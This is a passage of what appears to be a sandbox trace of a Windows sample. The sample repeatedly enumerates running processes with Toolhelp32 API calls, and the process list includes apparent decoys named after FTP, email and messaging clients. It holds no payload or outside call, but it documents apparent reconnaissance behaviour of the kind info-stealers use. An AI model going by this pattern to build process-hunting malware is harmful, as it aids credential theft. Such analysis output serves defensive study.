th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.775] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.778] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.780] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.783] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0192.785] CloseHandle (hObject=0x18bc) returned 1 [0192.785] Sleep (dwMilliseconds=0x64) [0192.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x123c [0192.907] Process32First (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.910] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.924] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.928] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.931] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.933] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.936] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.939] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.947] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.949] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.952] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.955] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.957] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.959] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.962] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.965] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.967] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.970] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.974] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.976] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.980] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.983] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.989] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.991] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.994] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.997] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.999] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0193.002] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0193.004] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0193.007] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0193.010] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.012] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.014] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0193.017] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.020] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.022] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.058] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.062] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0193.064] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0193.067] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0193.070] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0193.074] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0193.076] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0193.079] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0193.082] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0193.085] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0193.087] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0193.089] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0193.092] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0193.094] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0193.104] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0193.106] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0193.110] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0193.113] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0193.115] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0193.118] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0193.120] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0193.123] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0193.126] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0193.129] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0193.154] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0193.157] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0193.211] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0193.214] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0193.217] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0193.220] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0193.223] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0193.226] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0193.229] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0193.233] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0193.236] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0193.239] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0193.242] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0193.245] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0193.323] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0193.326] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0193.329] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0193.333] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0193.335] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0193.338] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 